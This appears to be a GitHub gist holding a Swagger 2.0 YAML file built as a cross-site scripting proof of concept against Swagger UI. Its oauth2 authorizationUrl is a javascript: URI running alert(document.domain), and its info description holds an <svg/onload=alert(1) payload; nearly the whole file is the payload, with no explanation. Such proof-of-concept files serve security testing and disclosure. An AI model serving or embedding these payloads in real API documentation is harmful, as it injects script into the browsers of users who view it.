Last active
July 5, 2021 07:25
-
-
Save vortexau/b438138e24bb3dd4592437ea347d90df to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
swagger: '2.0' | |
securityDefinitions: | |
a: | |
type: oauth2 | |
authorizationUrl: javascript:alert(document.domain)// | |
info: | |
version: "0.0.1" | |
title: Swagger UI | |
description: "<svg/onload=alert(1)" | |
paths: | |
/: | |
get: | |
responses: | |
200: | |
description: Successful respons |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment